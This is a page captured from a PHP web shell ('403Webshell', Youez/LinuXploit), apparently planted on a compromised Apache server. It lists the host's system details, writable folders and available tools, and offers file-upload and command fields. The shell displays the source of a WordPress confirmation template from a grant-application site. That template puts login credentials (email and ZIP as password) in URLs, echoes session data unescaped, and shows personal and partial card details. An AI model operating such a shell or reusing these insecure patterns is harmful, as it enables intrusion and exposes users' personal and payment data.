403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/usa_sites/governmentgrants.us/wp-content/themes/governmentgrantsus/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/usa_sites/governmentgrants.us/wp-content/themes/governmentgrantsus/template-confirm.php
<?php 
/** 
* Template Name: Confirmation Page 
*/

get_header('order');
if(empty($_SESSION['user_id']) && empty($_GET['show_confirm_page'])) {
	header("Location: https://www.governmentgrants.us/application/");
	exit(0);
}
require_once($_SERVER['DOCUMENT_ROOT'].'/lib/globals.php');
?>
   <!--Page sections-->
            <?php if( have_rows('add_section') ):

 	// loop through the rows of data
    while ( have_rows('add_section') ) : the_row();?>

                <section class="full-width <?php echo get_sub_field('section_class');?>" id="<?php echo get_sub_field('section_id');?>">
                    <div class="container">
                        <?php if( get_sub_field('section_header') ): ?>
                            <header class="section-header align-center">
                                    <!--section header content-->
                                    <?php the_sub_field( 'section_header' ); ?>
                            </header>
                            <?php endif ?>
                               <?php if( have_rows('grid_row') ): 
					while( have_rows('grid_row') ): the_row();?>
                                <div class="grid-row <?php echo get_sub_field('row_class');?>">
                                    <?php if( have_rows('column') ): 
					while( have_rows('column') ): the_row();?>
                                        <div class="<?php echo get_sub_field('column_class');?>">
                                            <?php echo get_sub_field('column_content');?>
                                        </div>
                                        <?php endwhile; endif;?>
                                        <!--end column-->
                                </div>
                                <?php endwhile; endif;?>
                                <!--end grid row-->
                    </div>

                </section>
                <?php endwhile; endif;?>
                
 <section class="application-form clear pb50">
    <div class="container">
		<h1>Login & Start Applying!</h1>
		<p>Congratulations! You are on your way to applying for Grant Money!</p>
		<p>Below is your Account Information that will allow you to access the Member's Site right now!</p>

		<p class="header">Government Grants User Account Info:</p>
		<center style="padding:10px 0px;">
		<h3 style="padding-right:5px;">Your Credit Card Statement will display:</h3>
		<div style="font-size:24px;">
		<?php
			include_once($_SERVER['DOCUMENT_ROOT'] . "/vx/lib/dinc.php");
			$res = $db->query("SELECT cc_descriptor FROM lc2{$_SITE_CODE}_lc.lc_billing WHERE client_id='".clean($user_id)."' ORDER BY bill_time DESC LIMIT 1");
			echo (empty($res[0]['cc_descriptor'])) ? 'USFUND.ORG 800-337-3471' : $res[0]['cc_descriptor'];
		?>
		</div>
		</center>
		<h3>To View the Funding Applications and Start Applying,</h3>
		<a href="/vx/usa/members/?user=<?= $_SESSION['application_form']['template-application-email']; ?>&pass=<?= $_SESSION['application_form']['template-application-zip']; ?>" style="font-size:24px;">Click Here to Login</a>
		<div class="grid-row fields">
			<div class="input-box col-mb-12">
				<strong>Website:</strong> <a href="https://governmentgrants.us">governmentgrants.us</a>
			</div>
			<div class="input-box col-mb-12">
				<strong>Username:</strong> <?= $_SESSION['application_form']['template-application-email']; ?>
			</div>
			<div class="input-box col-mb-12">
				<strong>Password:</strong> <?= $_SESSION['application_form']['template-application-zip']; ?>
			</div>
			<div class="input-box col-mb-12">
				<strong>Contact Page: </strong> <a href="https://governmentgrants.us/vx/usa/contact/">governmentgrants.us/vx/usa/contact/</a>
			</div>
		</div>
		<br />
		<h3>Personal Information Summary</h3>
		<div class="grid-row fields">
			<div class="input-box col-mb-6">
				<strong>First Name:</strong> <?= $_SESSION['application_form']['template-application-first-name']; ?>
			</div>
			<div class="input-box col-mb-6">
				<strong>Last Name:</strong> <?= $_SESSION['application_form']['template-application-last-name']; ?>
			</div>
			<div class="input-box col-mb-6">
				<strong>Address:</strong> <?= $_SESSION['application_form']['template-application-street-address']; ?>
			</div>
			<div class="input-box col-mb-6">
				<strong>City:</strong> <?= $_SESSION['application_form']['template-application-city']; ?>
			</div>
			<div class="input-box col-mb-6">
				<strong>State:</strong> <?= $_SESSION['application_form']['template-application-state']; ?>
			</div>
			<div class="input-box col-mb-6">
				<strong>Zip:</strong> <?= $_SESSION['application_form']['template-application-zip']; ?>
			</div>
			<div class="input-box col-mb-6">
				<strong>Zip:</strong> <?= $_SESSION['application_form']['template-application-phone']; ?>
			</div>
		</div>
		<br />
		<h3>Payment Information Summary</h3>
		<div class="grid-row fields">
			<div class="input-box col-mb-6">
				<strong>Credit Card:</strong> ****<?= substr($_SESSION['order_form']['cc_num'],-4); ?>
			</div>
			<div class="input-box col-mb-6">
				<strong>Expiration:</strong> <?= $_SESSION['order_form']['cc_exp_month']; ?> / <?= $_SESSION['order_form']['cc_exp_year']; ?>
			</div>
			<div class="input-box col-mb-6">
				<strong>Amount:</strong> $<?= number_format($_INITIAL_FEE,2); ?>
			</div>
		</div>
		<br />
		<center>
			<a href="/vx/usa/members/?user=<?= $_SESSION['application_form']['template-application-email']; ?>&pass=<?= $_SESSION['application_form']['template-application-zip']; ?>" style="font-size:24px;">Click Here to Login</a>
		</center>
    </div>
 </section>                       
<?php if(!empty($_SESSION['lead_id'])) { ?>
<img src="https://www.pcisecureform.com/lcapi/FormConfirmationPageTracking.php?site=ggus&lead_id=<?= $_SESSION['lead_id'];?>&client_id=<?= $_SESSION['user_id'];?>&form_url=<?= urlencode('/confirm/');?>" />
<?php } ?>
<?php get_footer();

Youez - 2016 - github.com/yon3zu
LinuXploit